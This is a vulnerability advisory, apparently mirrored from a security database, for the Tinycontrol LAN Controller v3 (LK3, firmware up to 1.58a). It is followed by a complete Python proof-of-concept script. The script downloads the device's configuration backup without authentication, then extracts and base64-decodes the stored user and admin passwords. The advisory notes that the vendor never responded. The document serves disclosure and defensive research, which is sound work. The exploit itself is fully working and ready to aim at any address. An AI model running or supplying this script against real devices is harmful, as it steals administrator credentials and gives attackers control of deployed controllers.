Lucene search

Gjoko KrsticZSL-2023-5786

HistorySep 01, 2023 - 12:00 a.m.

Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC

2023-09-0100:00:00

Gjoko Krstic

zeroscience.mk

175

tinycontrol

lan controller

remote credentials extraction

unauthenticated attacker

security bypass

privilege escalation

system access

exposure of system information

exposure of sensitive information

vendor status

vulnerability

public security advisory

AI Score

7.1

Confidence

Low

JSON

Title: Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC
Advisory ID: ZSL-2023-5786
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access, Exposure of System Information, Exposure of Sensitive Information
Risk: (5/5)
Release Date: 01.09.2023

Summary

Lan Controller is a very universal device that allows you to connect many different sensors and remotely view their readings and remotely control various types of outputs. It is also possible to combine both functions into an automatic if -> this with a calendar when -> then. The device provides a user interface in the form of a web page. The website presents readings of various types of sensors: temperature, humidity, pressure, voltage, current. It also allows you to configure the device, incl. event setting and controlling up to 10 outputs. Thanks to the support of many protocols, it is possible to operate from smartphones, collect and observ the results on the server, as well as cooperation with other I/O systems based on TCP/IP and Modbus.

Description

An unauthenticated attacker can retrieve the controller’s configuration backup file and extract sensitive information that can allow him/her/them to bypass security controls and penetrate the system in its entirety.

Vendor

Tinycontrol - <https://www.tinycontrol.pl>

Affected Version

<=1.58a, HW 3.8

Tested On

lwIP

Vendor Status

[18.08.2023] Vulnerability discovered.
[19.08.2023] Vendor contacted.
[31.08.2023] No response from the vendor.
[01.09.2023] Public security advisory released.

PoC

lk3_backup.py

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/174456/>
[2] <https://cxsecurity.com/issue/WLB-2023090014>
[3] <https://www.exploit-db.com/exploits/51731>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/275811>

Changelog

[01.09.2023] - Initial release
[22.09.2023] - Added reference [1] and [2]
[12.10.2023] - Added reference [3]
[14.02.2024] - Added reference [4]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>#!/usr/bin/env python
#
#
# Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC
#
#
# Vendor: Tinycontrol
# Product web page: https://www.tinycontrol.pl
# Affected version: &lt;=1.58a, HW 3.8
#
# Summary: Lan Controller is a very universal
# device that allows you to connect many different
# sensors and remotely view their readings and
# remotely control various types of outputs.
# It is also possible to combine both functions
# into an automatic if -&gt; this with a calendar
# when -&gt; then. The device provides a user interface
# in the form of a web page. The website presents
# readings of various types of sensors: temperature,
# humidity, pressure, voltage, current. It also
# allows you to configure the device, incl. event
# setting and controlling up to 10 outputs. Thanks
# to the support of many protocols, it is possible
# to operate from smartphones, collect and observ
# the results on the server, as well as cooperation
# with other I/O systems based on TCP/IP and Modbus.
#
# Desc: An unauthenticated attacker can retrieve the
# controller's configuration backup file and extract
# sensitive information that can allow him/her/them
# to bypass security controls and penetrate the system
# in its entirety.
#
# Tested on: lwIP
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5786
# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php
#
#
# 18.08.2023
#
#


import subprocess
import requests
import base64
import sys

binb = "lk3_settings.bin"
outf = "lk3_settings.enc"
bpatt = "0upassword"
epatt = "pool.ntp.org"
startf = False
endf = False
extral = []

print("""
    O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O
    |                                          |
    |     Tinycontrol LK3 1.58 Settings DL     |
    |              ZSL-2023-5786               |
    |         2023 (c) Zero Science Lab        |
    |                                          |
    |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|
    |                                          |
""")

if len(sys.argv) != 2:
    print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))
    exit(-0)
else:
    rhost=sys.argv[1]
    if not "http" in rhost:
        rhost="http://{}".format(rhost)

try:
    resp = requests.get(rhost + "/" + binb)
    if resp.status_code == 200:
        with open(outf, 'wb') as f:
            f.write(resp.content)
        print(f"[*] Got data as {outf}")
    else:
        print(f"[!] Backup failed. Status code: {resp.status_code}")
except Exception as e:
    print("[!] Error:", str(e))
    exit(-1)

binf = outf
sout = subprocess.check_output(["strings", binf], universal_newlines = True)
linea = sout.split("\n")

for thricer in linea:
    if bpatt in thricer:
        startf = True
    elif epatt in thricer:
        endf = True
    elif startf and not endf:
        extral.append(thricer)

if len(extral) &gt;= 4:
    userl = extral[1].strip()
    adminl = extral[3].strip()
    try:
        decuser = base64.b64decode(userl).decode("utf-8")
        decadmin = base64.b64decode(adminl).decode("utf-8")
        print("[+] User password:", decuser)
        print("[+] Admin password:", decadmin)
    except Exception as e:
        print("[!] Error decoding:", str(e))
else:
    print("[!] Regex failed.")
    exit(-2)
</p></body></html>

AI Score

7.1

Confidence

Low

JSON